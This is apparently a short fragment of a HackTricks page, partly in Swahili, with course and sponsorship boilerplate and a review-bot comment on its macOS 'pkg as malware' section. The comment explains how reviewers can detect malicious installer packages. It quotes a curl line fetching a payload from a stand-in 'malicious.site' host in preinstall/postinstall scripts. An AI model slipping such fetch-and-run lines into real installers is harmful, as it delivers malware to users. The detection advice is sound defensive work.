Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
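Review bot: the "pkg kama malware" section shows a `<script>` element with `system.run` calls landing in dist.xml but never says how a reviewer would spot it; add a sentence after the block pointing back to the Decompress section: expanding the package with `pkgutil --expand` (or opening it in Suspicious Package, linked above) exposes the Distribution file, and any `<script>` block calling `system.run`, together with `preinstall`/`postinstall` scripts that fetch and run remote content as in `curl -o /tmp/payload.sh http://malicious.site/payload.sh`, is what to flag before installation. Minor typos in the same hunk: "wich" and "missconfig" in the lldb comment, "Buil final" before the productbuild line, and "and attacker could control that script so he escalate privileges" should read "an attacker could control that script and escalate privileges".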